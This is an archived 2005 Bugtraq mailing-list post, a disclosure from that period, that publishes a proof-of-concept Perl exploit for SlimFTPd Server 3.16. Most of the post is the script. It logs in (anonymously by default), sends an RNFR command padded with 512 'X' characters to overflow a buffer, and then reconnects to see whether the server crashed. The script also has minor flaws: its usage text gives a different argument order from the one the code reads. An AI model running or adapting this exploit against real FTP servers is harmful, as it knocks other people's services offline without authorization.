lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 22 Jul 2005 01:51:25 +0000
From: Dim K0r0l <dim@...lytez.com>
To: bugtraq@...urityfocus.com
Subject: SlimFTPd Server: PoC Exploit


---------------------------------------
Affected version: 3.16
Bug found by Raphaƫl Rigo
PoC exploit for demonstration
---------------------------------------

*#!/usr/bin/perl*

/# --------------------------------------------------- #/
/# 47slimftpd_bof.pl - PoC exploit for SlimFTPd Server #/
/# version 3.16                                        #/
/# bug found by ml-bugtraq@...light-hall.net           #/
/#                                                     #/
/# coded by k0r0l from acolytez team                   #/
/# visit http://acolytez.com for details               #/
/# --------------------------------------------------- #/

*use* Net::FTP;

/# geting data/
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

/# ===========/

*if* (($host) && ($port)) {
	
	/# make exploit string/
	$exploit_string = *"*RNFR *"*;
 	$exploit_string .= *"*X*"*x512;
	/#  ===================/
	
	print *"*Trying to connect to $host:$port\n*"*;		
	$sock = Net::FTP->new(*"*$host*"*,Port => $port, TimeOut => 30, Debug => $debug) *or* die *"*[-] Connection failed\n*"*; 
	print *"*[+] Connect OK!\n*"*;
	print *"*Logging...\n*"*;
	*if* (!$user) {
		$user = *"*anonymous*"*;
		$pass = *"*ftp@....com*"*;
	}
	$sock->login($user, $pass);
	$answer = $sock->message;
	print *"*Sending string...\n*"*;
	$sock->quot($exploit_string);
	print *"*Server $host may be down. Checking...\n*"*;
	$sock = Net::FTP->new(*"*$host*"*,Port => $port, TimeOut => 30, Debug => $debug) *or* die *"*[-] Connection failed\n*"*; 
	*if* ($sock) {print *"*[-] Exploit failed.\n*"*;} *else* {print *"*[+] Server crashed!\n*"*;}
	
	
} *else* {
	print *"*SlimFTPd Server - PoC Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n*"*;
} 


-- 
+################################+
# Dim K0r0l (dim@...lytez.com)   #
#                                #
# http://AcolyteZ.com            #
# Net-security, coding, soft etc #
+################################+

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ